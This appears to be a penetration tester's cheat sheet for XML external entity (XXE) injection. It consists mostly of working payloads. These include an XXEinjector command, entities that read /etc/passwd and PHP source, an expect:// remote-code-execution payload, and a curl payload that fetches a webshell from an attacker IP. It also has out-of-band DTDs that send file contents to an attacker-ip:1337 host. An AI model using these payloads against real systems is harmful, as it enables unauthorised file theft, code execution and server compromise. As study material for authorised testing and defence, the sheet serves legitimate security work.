XXE

Tips

Check if there are requests sending XML to the backend, ideally where the backend doesn't sanitise
Check if some fields from the xml are displayed on the page to inject into
Check if changing the content-type to application/xml works (json2xml)

XXEinjector

XXEinjector

Copy a XML request from BURP and replace all of the xml except the top line with XXEINJECT

...
Accept-Language: en-US,en;q=0.9
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

ruby XXEinjector.rb --host=<attacker-ip> --httpport=8000 --file=/req.txt --path=/etc/passwd --oob=http --phpfilter

Detection

Check if you can read a variable from a DDT definition

<!DOCTYPE somefield [
  <!ENTITY xxe "vulnerable">
]>
&xxe;

Basic file read

<!DOCTYPE somefield [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>

Read PHP files

<!DOCTYPE somefield [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>

RCE

<!DOCTYPE somefield [
  <!ENTITY xxe SYSTEM "expect://id">
]>

Inject a webshell

<!DOCTYPE somefield [
  <!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'<ip>/shelle.php'">
]>

CDATA exfiltration

Host this snippet in a file on a http server

<!ENTITY joined "%begin;%file;%end;">

<!DOCTYPE somefield [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://<attacker-ip>:1337/joined.dtd">
  %xxe;
]>

<somefield>&joined;</somefield>

Error based

Check if sending malformed data triggers useful error messages

Host a DTD file containing something like this

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY content SYSTEM '%whatever;/%file;'>">

Then reference it

<!DOCTYPE somefield [ 
  <!ENTITY % xxe SYSTEM "http://<attacker-ip>:1337/error.dtd">
  %xxe;
  %error;
]>

Tips​

XXEinjector​

Detection​

Basic file read​

Read PHP files​

RCE​

Inject a webshell​

CDATA exfiltration​

Error based​

Out of band blind exfiltration​